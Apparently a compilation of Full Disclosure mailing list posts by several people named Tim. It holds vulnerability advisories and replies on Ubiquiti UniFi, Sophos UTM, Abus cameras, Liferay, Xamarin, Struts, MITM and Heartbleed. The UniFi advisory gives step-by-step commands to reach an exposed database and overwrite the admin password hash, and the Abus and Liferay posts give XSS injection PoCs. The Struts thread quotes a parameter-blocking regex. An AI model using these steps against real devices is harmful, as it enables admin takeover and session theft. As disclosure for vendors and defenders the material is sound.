>  
> "$6$Se9i5I7k3hI8d4bk$CqEXRUwk7c7A/62E/HcC4SrMSLOrBdm7wRvwTS4t.nNJA3RYta0RfzJpuREg.qcAHsPGW9Gjwm3krJROXzbCv."}})"
>  4. Login via web interface with new password
> 
> 
> Best regards / Mit freundlichen Grüßen
> 
> 
> Tim Schughart
> CEO / Geschäftsführer
> 
> --
> ProSec Networks e.K.
> Ellingshohl 82
> 56077 Koblenz
> 
> Website: https://www.prosec-networks.com
> E-Mail: t.schugh...@prosec.networks.com
> Mobile: +49 (0)157 7901 5826
> Phone: +49 (0)261 450 930 90
> 
> "This E-Mail communication may contain CONFIDENTIAL, PRIVILEGED and/or 
> LEGALLY PROTECTED information and is intended only for the named 
> recipient(s). Any unauthorized use, dissemination, copying or forwarding is 
> strictly prohibited. If you are not the intended recipient and have received 
> this email communication in error, please notify the sender immediately, 
> delete it and destroy all copies of this E-Mail. VAT ID: DE290654714 legal 
> domicile Koblenz, HRA 21625.“
> 
> "Diese E-Mail Mitteilung kann VERTRAULICHE, dem BERUFSGEHEIMNIS UNTERLIEGENDE 
> und/oder RECHTLICH GESCHÜTZTE Informationen enthalten und ist ausschließlich 
> für den/die genannten Adressaten bestimmt. Jede unbefugte Nutzung, 
> Weitergabe, Vervielfältigung oder Versendung ist strengstens verboten. 
> Sollten Sie nicht der angegebene Adressat sein und diese E-Mail Mitteilung 
> irrtümlich erhalten haben, informieren Sie bitte sofort den Absender, löschen 
> diese E-Mail und vernichten alle Kopien. USt-IdNr.:  DE290654714, Amtsgericht 
> Koblenz, HRA 21625."
> 
> ___
> Sent through the Full Disclosure mailing list
> https://nmap.org/mailman/listinfo/fulldisclosure
> Web Archives & RSS: http://seclists.org/fulldisclosure/
> 


___
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/

[FD] Critical Vulnerability in Ubiquiti UniFi

[Tim Schughart]

Hello @all, 

together with my colleague we found two uncritical vulnerabilities you'll find 
below.

Product: UniFi AP AC Lite
Vendor: Ubiquiti Networks Inc. 

Internal reference: ? (Bug ID)
Vulnerability type: Incorrect access control 
Vulnerable version: Unify 5.2.7 and possible other versions affected (not 
tested)
Vulnerable component: Database
Report confidence: yes
Solution status: Not fixed by Vendor, the bug is a feature. 
Fixed versions: -
Researcher credits: Tim Schughart, Immanuel Bär, Khanh Quoc Pham of ProSec 
Networks
Solution date: - 
Public disclosure: 2016-09-30
CVE reference: CVE-2016-7792
CVSSv3: 8.8 AV:A/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H 


Vulnerability Details:
You are able to connect to the access points database, because of an broken 
authentication (OWASP TOP10). So you are able to modify the database and read 
the data. An possible scenario you'll find in PoC section. 

Risk:
An attacker gets access to the database and for e.g. is able to change the 
admins password, like you see in PoC below. 

PoC: 
 1. Generate SHA512 Hash with e.g.
 mkpasswd -m sha-512

 2. Connect via network to database, e.g. :
 mongo --port 27117 --host target_ip

 3. Change password via command
 "db.admin.update({"name":"ProSec"}, {$set : {"x_shadow":
 
"$6$Se9i5I7k3hI8d4bk$CqEXRUwk7c7A/62E/HcC4SrMSLOrBdm7wRvwTS4t.nNJA3RYta0RfzJpuREg.qcAHsPGW9Gjwm3krJROXzbCv."}})"
 4. Login via web interface with new password


Best regards / Mit freundlichen Grüßen 


Tim Schughart 
CEO / Geschäftsführer  

--
ProSec Networks e.K. 
Ellingshohl 82  
56077 Koblenz 

Website: https://www.prosec-networks.com 
E-Mail: t.schugh...@prosec.networks.com 
Mobile: +49 (0)157 7901 5826
Phone: +49 (0)261 450 930 90   

"This E-Mail communication may contain CONFIDENTIAL, PRIVILEGED and/or LEGALLY 
PROTECTED information and is intended only for the named recipient(s). Any 
unauthorized use, dissemination, copying or forwarding is strictly prohibited. 
If you are not the intended recipient and have received this email 
communication in error, please notify the sender immediately, delete it and 
destroy all copies of this E-Mail. VAT ID: DE290654714 legal domicile Koblenz, 
HRA 21625.“

"Diese E-Mail Mitteilung kann VERTRAULICHE, dem BERUFSGEHEIMNIS UNTERLIEGENDE 
und/oder RECHTLICH GESCHÜTZTE Informationen enthalten und ist ausschließlich 
für den/die genannten Adressaten bestimmt. Jede unbefugte Nutzung, Weitergabe, 
Vervielfältigung oder Versendung ist strengstens verboten. Sollten Sie nicht 
der angegebene Adressat sein und diese E-Mail Mitteilung irrtümlich erhalten 
haben, informieren Sie bitte sofort den Absender, löschen diese E-Mail und 
vernichten alle Kopien. USt-IdNr.:  DE290654714, Amtsgericht Koblenz, HRA 
21625."

___
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/

[FD] Multiple exposures in Sophos UTM

[Tim Schughart]

Hello @all, 

together with my colleague we found two uncritical vulnerabilities you'll find 
below.

Product: Sophos UTM
Vendor: Sophos ltd. 

Internal reference: ? (Bug ID)
Vulnerability type: Information Disclosure
Vulnerable version: 9.405-5, 9.404-5 and possible other versions affected (not 
tested)
Vulnerable component: Frontend
Report confidence: yes
Solution status: Not fixed by Vendor, no further responses from vendor. 
Fixed versions: -
Researcher credits: Tim Schughart & Khanh Quoc Pham of ProSec Networks
Vendor notification: 2016-09-01
Solution date: - 
Public disclosure: 2016-09-30
CVE reference: CVE-2016-7397
CVSSv3: 6.7 AV:L/AC:L/PR:H/UI:N/S:C/C:H/I:L/A:N

Report timeline:
2016-09-01: Contacted Vendor, vendor acknowledged, no further response 
2016-09-12: Contacted Vendor again, started to fix 
2016-09-30: Contacted Vendor again, because there has been no response to our 
request and our initial told disclosing date, no response again. 
2016-09-30: Public Disclosure. 

Vulnerability Details:
The password is reflected to DOM and is readable through the "value" field of 
the SMTP user settings in notifications tab. You have to be authenticated to 
access the configuration tab. 

Risk:
An attacker gets access to the configured mailbox. Because of Sophos UTM is a 
multi user system, this is a problem in bigger company environments with 
splitted admin rights. The surface scope is changed, because in bigger 
environments you are getting access to the configured mailbox, which results in 
an integrity loss. 

Steps to reproduce:
See vulnerability details.


--


Product: Sophos UTM
Vendor: Sophos ltd. 

Internal reference: ? (Bug ID)
Vulnerability type: Information Disclosure
Vulnerable version: 9.405-5, 9.404-5 and possible other versions affected (not 
tested)
Vulnerable component: Frontend
Report confidence: ?
Solution status: Not fixed by Vendor
Fixed versions: -
Researcher credits: Tim Schughart & Khanh Quoc Pham of ProSec Networks
Vendor notification: 2016-09-01
Solution date: -
Public disclosure: 2016-10-01
CVE reference: CVE-2016-7442 
CVSSv3: 6.7 AV:L/AC:L/PR:H/UI:N/S:C/C:H/I:L/A:N

Vulnerability Details:
The password is reflected to DOM and is readable through the "value" field of 
the proxy user settings in the system settings / scan settings / anti spam. You 
have to be authenticated to access the configuration tab.

Risk:
An attacker gets access to the configured proxy user. Because of Sophos UTM is 
a multi user system, this is a problem in bigger company environments with 
splitted admin rights. The surface scope is changed, because in bigger 
environments you are getting access to the configured proxy user, which results 
in an privilege escalation. 

Steps to reproduce:
See vulnerability details. 


Best regards / Mit freundlichen Grüßen 

Tim Schughart 
CEO / Geschäftsführer  

--
ProSec Networks e.K. 
Ellingshohl 82  
56077 Koblenz 

Website: https://www.prosec-networks.com 
E-Mail: t.schugh...@prosec.networks.com 
Mobile: +49 (0)157 7901 5826
Phone: +49 (0)261 450 930 90   

"This E-Mail communication may contain CONFIDENTIAL, PRIVILEGED and/or LEGALLY 
PROTECTED information and is intended only for the named recipient(s). Any 
unauthorized use, dissemination, copying or forwarding is strictly prohibited. 
If you are not the intended recipient and have received this email 
communication in error, please notify the sender immediately, delete it and 
destroy all copies of this E-Mail. VAT ID: DE290654714 legal domicile Koblenz, 
HRA 21625.“

"Diese E-Mail Mitteilung kann VERTRAULICHE, dem BERUFSGEHEIMNIS UNTERLIEGENDE 
und/oder RECHTLICH GESCHÜTZTE Informationen enthalten und ist ausschließlich 
für den/die genannten Adressaten bestimmt. Jede unbefugte Nutzung, Weitergabe, 
Vervielfältigung oder Versendung ist strengstens verboten. Sollten Sie nicht 
der angegebene Adressat sein und diese E-Mail Mitteilung irrtümlich erhalten 
haben, informieren Sie bitte sofort den Absender, löschen diese E-Mail und 
vernichten alle Kopien. USt-IdNr.:  DE290654714, Amtsgericht Koblenz, HRA 
21625."

___
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/

[FD] Persistent XSS in Abus Security Center - CVSS 8.0

[Tim Schughart]

Hi@all, 

Product: Abus Security Cams 
Vendor:Abus Group  

Internal reference: - 
Vulnerability type: Cross Site Scripting 
Vulnerable version: 0101a and possible other versions affected (not tested)
Vulnerable component: FTP
Report confidence: Confirmed
Solution status: Not fixed by Vendor, will not patch the vuln. 
Fixed versions: -
Researcher credits: Tim Schughart & Khanh Quoc Pham of ProSec Networks
Vendor notification: 2016-09-21
Solution date: 
Public disclosure: 2016-09-29
CVE reference: 
CVSSv3: 8.0 AV:A/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H 
<https://nvd.nist.gov/cvss/v3-calculator?vector=AV:A/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H>

Vulnerability Details:
The entered username via FTP login is reflected to the log which is rendered in 
the web interface without input validation. This results in an successfull, 
persistent, XSS.

Risk:
Through this you are able to get e.g. the session cookies of the cams 
administrator. So you are able to get full access - persistent. 

PoC: 
FTP Username: alert(document.cookie) 
FTP Pass: any 

Browse to log and watch the popup :) 


Best regards / Mit freundlichen Grüßen 

Tim Schughart 
CEO / Geschäftsführer  

--
ProSec Networks e.K.
Ellingshohl 82
56076 Koblenz 

Website: https://www.prosec-networks.com <http://www.prosec-networks.com/> 
E-Mail: t.schugh...@prosec.networks.com <mailto:i...@prosec.networks.com> 
Mobile: +49 (0)157 7901 5826
Phone: +49 (0)261 450 930 90

"This E-Mail communication may contain CONFIDENTIAL, PRIVILEGED and/or LEGALLY 
PROTECTED information and is intended only for the named recipient(s). Any 
unauthorized use, dissemination, copying or forwarding is strictly prohibited. 
If you are not the intended recipient and have received this email 
communication in error, please notify the sender immediately, delete it and 
destroy all copies of this E-Mail. VAT ID: DE290654714 legal domicile Koblenz, 
HRA 21621.“

"Diese E-Mail Mitteilung kann VERTRAULICHE, dem BERUFSGEHEIMNIS UNTERLIEGENDE 
und/oder RECHTLICH GESCHÜTZTE Informationen enthalten und ist ausschließlich 
für den/die genannten Adressaten bestimmt. Jede unbefugte Nutzung, Weitergabe, 
Vervielfältigung oder Versendung ist strengstens verboten. Sollten Sie nicht 
der angegebene Adressat sein und diese E-Mail Mitteilung irrtümlich erhalten 
haben, informieren Sie bitte sofort den Absender, löschen diese E-Mail und 
vernichten alle Kopien. USt-IdNr.:  DE290654714, Amtsgericht Koblenz, HRA 
21621."









___
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/

[FD] Sicherheitslücke - Liferay Portal Enterprise Edition

[Tim Schughart]

Hey guys,

during a penatrationtest I have found an unknown persistent xss in liferay 
portal backend.

##
#General Information#
##


Manufacture description:
Liferay Portal is an enterprise-web-platform for the development of business 
solutions, which provides quick results and long-term values.



#Details#

· Product:  Liferay Portal 
Enterprise Edition (6.2 EE SP13)
· Affected versions :   All <= 6.2 EE SP13
· Type of attack:   Persistent  Cross Site 
Scripting
· Proof Of Concept: Yes, 6.2 EE SP13
· Authentication required:  Yes
· Reason:   Missing input validation
· Impact:   Injection of 
malicious  JavaScript code

##
#PoC#
##
You have to be authenticated in the administrator backend.
Here you have to browse to the control center:
- In configuration click on portal settings
- Select authentication
- Select ldap
- select add server
- input following code in server name

Value for ldap server name field:
Name_of_ldap_serveralert("XSS")

The script is inserted to the configuration page persistent until the ldap 
server is deleted from database again.

Best regards / Mit freundlichen Grüßen

Tim Schughart
CEO | IT Security specialist



ProSec Networks
Website: http://www.prosec-networks.com <http://www.prosec-networks.com/>
E-Mail: i...@prosec.networks.com <mailto:i...@prosec.networks.com>
Phone: +49(0) 2621 9469 252

"This E-Mail communication may contain CONFIDENTIAL, PRIVILEGED and/or LEGALLY 
PROTECTED information and is intended only for the named recipient(s). Any 
unauthorized use, dissemination, copying or forwarding is strictly prohibited. 
If you are not the intended recipient and have received this email 
communication in error, please notify the sender immediately, delete it and 
destroy all copies of this E-Mail. VAT ID: DE290654714 legal domicile Koblenz.“

"Diese E-Mail Mitteilung kann VERTRAULICHE, dem BERUFSGEHEIMNIS UNTERLIEGENDE 
und/oder RECHTLICH GESCHÜTZTE Informationen enthalten und ist ausschließlich 
für den/die genannten Adressaten bestimmt. Jede unbefugte Nutzung, Weitergabe, 
Vervielfältigung oder Versendung ist strengstens verboten. Sollten Sie nicht 
der angegebene Adressat sein und diese E-Mail Mitteilung irrtümlich erhalten 
haben, informieren Sie bitte sofort den Absender, löschen diese E-Mail und 
vernichten alle Kopien. USt-IdNr.:  DE290654714, Amtsgericht Koblenz."






signature.asc
Description: Message signed with OpenPGP using GPGMail

___
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/

Re: [FD] Xamarin for Android 5.1 DLL Hijack Vulnerability

[Tim]

Isn't this the public bug tracker?

https://bugzilla.xamarin.com/describecomponents.cgi?product=Android

Though, correct that case id doesn't map to anything there.

-Tim Strazzere

On Tue, May 19, 2015 at 2:32 PM, ValdikSS i...@valdikss.org.ru wrote:

  They don't have public bugtracker. Case ID is 140518.

 On 05/20/2015 12:29 AM, Tim wrote:
  Thanks for posting this to FD, these didn't even include it in their
 release notes;
 
 
 http://developer.xamarin.com/releases/android/xamarin.android_5/xamarin.android_5.1/
 
  Was there a bug reported in bugzilla to link back too?
 
  -Tim Strazzere
 
  On Tue, May 19, 2015 at 6:49 AM, ValdikSS i...@valdikss.org.ru
 mailto:i...@valdikss.org.ru i...@valdikss.org.ru wrote:
 
 

 Xamarin for Android prior to version 5.1 allows to replace internal DLL
 files inside the APK with files on SD card which are not in a secure
 storage.
 Malicious application without any special permissions could drop
 backdoored DLL files into

 /storage/sdcard0/Android/data/app_id/files/.__override__/

 and the victim application would use files from SD.
 Not just the main application library could be hijacked, but also
 Xamarin's System.dll and Mono.Android.dll, which are shipped in all Xamarin
 for Android
 applications.

 Developers should rebuild their applications using Xamarin for Android 5.1
 or newer in the release mode.

 This vulnerability was found by accident, which allowed me to eat for free
 for a month.

 Timeline:
 03.04.2015 Vulnerability is found
 07.04.2015 Message sent to Xamarin
 08.04.2015 Xamarin acknowledged the vulnerability
 29.04.2015 Fixed stable version released

  
 
  ___
  Sent through the Full Disclosure mailing list
  https://nmap.org/mailman/listinfo/fulldisclosure
  Web Archives  RSS: http://seclists.org/fulldisclosure/
 
 




___
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives  RSS: http://seclists.org/fulldisclosure/

Re: [FD] Xamarin for Android 5.1 DLL Hijack Vulnerability

[Tim]

Thanks for posting this to FD, these didn't even include it in their
release notes;

http://developer.xamarin.com/releases/android/xamarin.android_5/xamarin.android_5.1/

Was there a bug reported in bugzilla to link back too?

-Tim Strazzere

On Tue, May 19, 2015 at 6:49 AM, ValdikSS i...@valdikss.org.ru wrote:


 -BEGIN PGP SIGNED MESSAGE-
 Hash: SHA256

 Xamarin for Android prior to version 5.1 allows to replace internal DLL
 files inside the APK with files on SD card which are not in a secure
 storage.
 Malicious application without any special permissions could drop
 backdoored DLL files into

 /storage/sdcard0/Android/data/app_id/files/.__override__/

 and the victim application would use files from SD.
 Not just the main application library could be hijacked, but also
 Xamarin's System.dll and Mono.Android.dll, which are shipped in all Xamarin
 for Android
 applications.

 Developers should rebuild their applications using Xamarin for Android 5.1
 or newer in the release mode.

 This vulnerability was found by accident, which allowed me to eat for free
 for a month.

 Timeline:
 03.04.2015 Vulnerability is found
 07.04.2015 Message sent to Xamarin
 08.04.2015 Xamarin acknowledged the vulnerability
 29.04.2015 Fixed stable version released

 -BEGIN PGP SIGNATURE-
 Version: GnuPG v2
 Comment: https://keybase.io/valdikss

 iQIcBAEBCAAGBQJVWz98AAoJEFzXIC7viPdyP3wP/3Vxrc0hHZATTfkCVq688sJa
 /NI2Z7cdRf3cpHSLCciWbtcNK82uE6qmHisFwUQGA5xvljhrkAXLPa2xG3wShmXq
 G5ID3WexMWgTfLqYwOi/4fq1jpfeEg5vpDFAhj0JuWAvZg1zOwFBQ7UdT6G/eu1C
 +Dgmk1qpvLcPkKOrh2i4xwqkDfqNfADfK7ekjeqMZe70tC95eHLeRWzVEmi+hCC3
 zLwnuprHOEQ/CGeKiQJzePExARFyIfS/kuV+YPdw14gmEOwKAfFymuaxYqULqaxS
 H6RdUJp2SZT5cf0RSlA7zqPhX8fqnkiBiCpd8BstoANl+dFvnggVks6PWovBm8aW
 huYqscwDZ0pGG8kV5lPO/9fE2P/1nm9B1h9tOcycD8gpM7inbDy6WoETwO0KZOlx
 qsetTdYt4PA5V6Wn6wks4R9iPZy7bFlqzrGWLWFY9FYV7a0cZoDi7eY8bNhxFj/T
 g3M1ruIIRVxriyFjcfmq2nWw0rMFhiaDdb/GuQEmtN8b2CQRQmiBrvP1uC2zkOhW
 ijdYsN7SMjvLTch3n6TU3ycibB0uEp03Jgm2+wRzZj5VQXUHR7BFzhh74UeeAriT
 K7EialPddQzxPFS0ufTGQ1JFfjJP3bgZFLDwbJVt/WLwsgQpLmXcTjHub56lr87y
 xQmqbzDDykOJ92uZEJ4X
 =vW6d
 -END PGP SIGNATURE-


 ___
 Sent through the Full Disclosure mailing list
 https://nmap.org/mailman/listinfo/fulldisclosure
 Web Archives  RSS: http://seclists.org/fulldisclosure/


___
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives  RSS: http://seclists.org/fulldisclosure/

Re: [FD] [ANN] Struts 2 up to 2.3.16.1: Zero-Day Exploit Mitigation (security | critical)

[Tim]

Also, I'm a tad confused by the regex you have as a stop-gap.  For the
readers' convenience:

(.*\.|^|.*|\[('|))(c|C)lass(\.|('|)]|\[).*,^dojo\..*,^struts\..*,^session\..*,^request\..*,^application\..*,^servlet(Request|Response)\..*,^parameters\..*,^action:.*,^method:.*


If your regex evaluation is case-sensitive, then clearly you need to
check for class and Class, since OGNL converts foo to getFoo,
and would likely also convert Foo to getFoo.  But if the blacklist
is case sensitive, then don't you also need to check for
^Request..., ^Session..., ^Struts..., and so on?  Or is it
actually case insensitive and you're just being unnecessarily careful
with class?

Also: Thought about unicode lately?

tim


PS- yes, I'm too lazy to actually look at the Struts code right now.



On Fri, Apr 25, 2014 at 09:52:23AM -0700, Tim wrote:
 
 
 So I have to say, I feel like the Struts team is kind of... failing.
 Here are my gripes:
 
 A) I questioned the last bug fix in the thread here [1], where we
were all reassured that it was just ClassLoader manipulation, not 
RCE.  Clearly that's not true.
 
 B) The fix for the last CVE was that crappy ^class\. filter, which
I pointed out was insufficient.  The Struts team quickly fixed
that, but never bothered to update the workaround section in the 
last advisory to the less-terrible .*\.class\..* regex (or whatever
it was).  So if developers just implemented the work around from
the advisory, they were obviously not protected.  (In hindsight,
they never were protected even with the better regex, but was just
irresponsible not to make the second regex more public.)
 
 C) The Struts team is playing whack-a-mole.  Instead of fixing the
root issue, they are just adding one blacklist regex after another,
hoping no one figures out yet another way around it.
 
 
 I urge you to take OGNL and *throw it out*.  Replace it with something
 that allows only a white list of properties to be set, based on what
 the application defines as relevant.  Until then, I'm recommending to
 my clients that they avoid Struts like the plague.
 
 tim
 
 1. http://seclists.org/fulldisclosure/2014/Mar/53
 
 
 
 On Thu, Apr 24, 2014 at 05:37:13PM +0200, Rene Gielen wrote:
  In Struts 2.3.16.1, an issue with ClassLoader manipulation via request
  parameters was supposed to be resolved. Unfortunately, the correction
  wasn't sufficient.
  
  A security fix release fully addressing this issue is in preparation and
  will be released as soon as possible.
  
  Once the release is available, all Struts 2 users are strongly
  recommended to update their installations.
  
  * Until the release is available, all Struts 2 users are strongly
  recommended to apply the mitigation described in [1] *
  
  Please follow the Apache Struts announcement channels [2][3][4][5] to
  stay updated regarding the upcoming security release. Most likely the
  release will be available within the next 72 hours. Please prepare for
  upgrading all Struts 2 based production systems to the new release
  version once available.
  
  - The Apache Struts Team.
  
  [1] http://struts.apache.org/announce.html#a20140424
  [2] http://struts.apache.org/mail.html
  [3] http://struts.apache.org/announce.html
  [4] https://plus.google.com/+ApacheStruts/posts
  [5] https://twitter.com/TheApacheStruts
  
  -- 
  René Gielen
  http://twitter.com/rgielen
  
  ___
  Sent through the Full Disclosure mailing list
  http://nmap.org/mailman/listinfo/fulldisclosure
  Web Archives  RSS: http://seclists.org/fulldisclosure/
 
 ___
 Sent through the Full Disclosure mailing list
 http://nmap.org/mailman/listinfo/fulldisclosure
 Web Archives  RSS: http://seclists.org/fulldisclosure/

___
Sent through the Full Disclosure mailing list
http://nmap.org/mailman/listinfo/fulldisclosure
Web Archives  RSS: http://seclists.org/fulldisclosure/

Re: [FD] Audit: don't only focus on heartbleed issue

[Tim]

 and the others need a MITM attack which is not *that* easy
 as connect to a server and send a heartbleed-packet without
 anything in the logs of the attacked server

I agree with you here.  It seems that Lucky13 requires much more
access and is much harder to pull off in practice.  Unless there's
new techniques out there that I haven't kept up on

 frankly outside a public hotspot / untrusted network nobody
 but the NSA and otehr agencies are able to really to MITM

This I think is a misconception, or at least overstated.  Anyone on
the same network as you can MitM you.  Anyone on the same network as
the remote end point can MitM you.  For some reason in this day and
age people have all forgotten about ARP poisoning, netbios name
poisoning, DHCP hijacking, and a whole host of other ways to redirect
traffic.  And apparently random people halfway around the world can
hijack your DNS resolver[1].

The dividing line between internal network and the Internet is
becoming fuzzier every day.  It is getting easier to get inside and
yet everyone still seems to run an unsegmented internal trusted
network.

tim


1. 
http://arstechnica.com/information-technology/2014/03/google-dns-briefly-hijacked-to-venezuela/

___
Sent through the Full Disclosure mailing list
http://nmap.org/mailman/listinfo/fulldisclosure
Web Archives  RSS: http://seclists.org/fulldisclosure/

Re: [FD] heartbleed OpenSSL bug CVE-2014-0160

[Tim Schütt]

Nope, works also on other protocols like IMAPS.


Am 08.04.2014 15:30, schrieb Chris Schmidt:
 The bug is in the TLS implementation in OpenSSL, you will only see it on 
 https 

 Sent from my iPhone

 On Apr 8, 2014, at 4:43 AM, Nik Mitev n...@mitev.net wrote:

 I used the tool Kirils linked (http://possible.lv/tools/hb/) and my
 unpatched servers running a Tor node or an Openvpn server returned
 correct (old) version of openssl but not vulnerable.
 Is it the bug or the tool that seems to be limited to https I wonder?

 Patched now so can't test with this tool...

 -Original Message-
 From: Fraser Scott fraser.sc...@gmail.com
 To: fulldisclosure@seclists.org
 Subject: Re: [FD] heartbleed OpenSSL bug CVE-2014-0160
 Date: Tue, 8 Apr 2014 10:24:02 +0100

 This seems to be the best test so far:

 http://s3.jspenguin.org/ssltest.py

 Other tests false-positive on patched versions from what I can see.


 On 8 April 2014 01:10, Kirils Solovjovs kirils.solovj...@kirils.com wrote:

 We are doomed.

 Description: http://www.openssl.org/news/vulnerabilities.html
 Article dedicated to the bug: http://heartbleed.com/
 Tool to check if TLS heartbeat extension is supported:
 http://possible.lv/tools/hb/

 A missing bounds check in the handling of the TLS heartbeat extension
 can be used to reveal up to 64kB of memory to a connected client or server.

 1.0.1[ abcdef] affected.


 P.S. Happy Monday!

 ___
 Sent through the Full Disclosure mailing list
 http://nmap.org/mailman/listinfo/fulldisclosure
 Web Archives  RSS: http://seclists.org/fulldisclosure/
 ___
 Sent through the Full Disclosure mailing list
 http://nmap.org/mailman/listinfo/fulldisclosure
 Web Archives  RSS: http://seclists.org/fulldisclosure/

 ___
 Sent through the Full Disclosure mailing list
 http://nmap.org/mailman/listinfo/fulldisclosure
 Web Archives  RSS: http://seclists.org/fulldisclosure/
 ___
 Sent through the Full Disclosure mailing list
 http://nmap.org/mailman/listinfo/fulldisclosure
 Web Archives  RSS: http://seclists.org/fulldisclosure/


___
Sent through the Full Disclosure mailing list
http://nmap.org/mailman/listinfo/fulldisclosure
Web Archives  RSS: http://seclists.org/fulldisclosure/